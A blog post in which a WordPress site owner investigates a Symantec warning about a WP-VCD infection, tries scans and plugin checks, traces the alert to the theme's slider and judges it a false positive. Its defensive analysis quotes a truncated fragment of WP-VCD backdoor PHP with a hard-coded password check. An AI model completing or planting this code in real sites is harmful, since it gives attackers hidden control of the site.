Here is what I got when I visited my WordPress website, www.51sec.org. It looks like very interesting and I am wondering what has been detected.
Based on warning message and SID and I am able to find following details from Symantec (Broadcom) website:
===========================================================================
Description
Additional Information
engine results on behalf of attackers) and insertion of malvertising code that creates potentially dangerous redirects and pop-up ads for users viewing a compromised site.
Affected
- WordPress websites
===========================================================================
I were keeping digging into this WP-VCD infection and thinking my site probably infected. Here is what I found for WP-VCD.
===========================================================================
|
1
2
3
4
5
6
7
8
|
<?phpif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474')) {$div_code_name="wp_vcd";switch ($_REQUEST['action']){ case 'change_domain'; if (isset($_REQUEST['newdomain'])) |
===========================================================================
Before starting to compare the backup files with current files to find out where is this WP-VCD code injected, I am thinking about to try some other steps first.
By looking at Symantec Endpoint Protection, I could not see any details to help.
Interesting thing is this warning only shows on homepage , not other pages in this website. That is first thing I noticed. If it is the theme or plug in infected, should all pages got this warning?
1. Online vulnerability scan, security checking
I could not find any other online scanning tools to warn similar.
2. Upgrade themes and plugins
All themes and plugins have been upgrade to latest version.
3. Deactivate plugins
checking all related plug-in and deactivate them one by one to see if that helps, but found nothing.
4. Focusing on interesting things you found
Eventually I were thinking what is different from first homepage to other page. Only section shows on first page is Slider settings.
I decided to turn off Slider settings on all pages as shown in following screenshot, then that annoying warning message has gone.
5. Installed malcare plugin to scan whole site and found nothing from my site.
This is quite decent and useful software for site securty, it will grab some of database tables and all site files to its cloud server to do scanning. WP-VCD signature definitely is in its database. If there is anything related to WP-VCD, Malcare will find it out.
6. My last resort would be comparing files from backup.
That would take a bit long to figure out. Glad I am able to find out it is slider causing this. It might relate to slider code from Startup Blog Theme by Compete Themes.
To sum up, this is just false positive from Symantec Endpoint Protection software based on my troubleshooting in this morning. Symantec security has been bought out by Broadcom for a while. the future for Symantec product is not clear. I might need to think about to change to other security software.
Note. This message only happens to Chrome browser , not Edge. It has been reported to Symantec Review site – https://symsubmit.symantec.com/
References
- Responding to suspected IPS false positives in Endpoint Protection
- Submit suspicious files to Symantec Security Response
- Symantec Submission Site